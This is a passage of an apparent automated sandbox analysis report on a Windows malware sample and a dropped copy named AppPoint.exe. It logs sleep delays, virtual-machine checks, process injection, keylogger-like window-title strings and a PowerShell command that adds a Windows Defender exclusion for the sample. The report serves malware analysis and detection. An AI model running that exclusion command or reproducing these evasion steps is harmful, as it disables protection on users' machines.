Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 595342	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 594891	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 594672	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Thread delayed: delay time: 594562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 599888	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 599643	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 599527	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 599144	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 599016	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598225	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597344	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597016	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596905	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596669	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596561	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596426	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596297	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596187	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595391	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595063	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 594938	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 594826	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 594708	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 594593	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 594480	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 594371	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 594124	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 594000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 599671
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 599343
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 599234
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 599122
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 599015
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598905
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598796
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598687
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598578
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598468
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598359
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598250
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598140
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 598030
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597921
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597812
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597703
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597593
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597484
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597374
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597265
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597156
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 597046
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596937
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596828
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596718
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596609
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596500
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596390
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596281
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596171
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 596062
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595952
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595843
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595734
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595624
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595515
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595406
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595296
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595186
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 595078
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 594968
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 594859
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 594749
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Thread delayed: delay time: 594640

Source: AppPoint.exe, 0000000C.00000002.4517554556.0000000000E12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
Source: IUqsn1SBGy.exe, 00000000.00000002.2128770746.0000000009B67000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: IUqsn1SBGy.exe, 00000005.00000002.4516810559.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: AppPoint.exe, 0000000A.00000002.4537875123.0000000005B20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll$

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IUqsn1SBGy.exe"
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IUqsn1SBGy.exe"			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Memory written: C:\Users\user\Desktop\IUqsn1SBGy.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory written: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Memory written: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IUqsn1SBGy.exe"	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process created: C:\Users\user\Desktop\IUqsn1SBGy.exe "C:\Users\user\Desktop\IUqsn1SBGy.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process created: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe "C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process created: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe "C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process created: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe "C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe"

Source: IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (11/01/2025 01:36:33)<br>{Win}r
Source: IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002C70000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managert-]q
Source: IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002C70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (11/01/2025 01:36:33)<br>{Win}THbqL
Source: IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002C70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q
Source: IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (11/01/2025 01:36:33)<br>{Win}r@\]q6
Source: IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (11/01/2025 01:36:33)<br>{Win}r@\]q
Source: IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002C70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (11/01/2025 01:36:33)<br>@\]q
Source: IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002C70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (11/01/2025 01:36:33)<br>{Win}rTHbqL

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Queries volume information: C:\Users\user\Desktop\IUqsn1SBGy.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Queries volume information: C:\Users\user\Desktop\IUqsn1SBGy.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
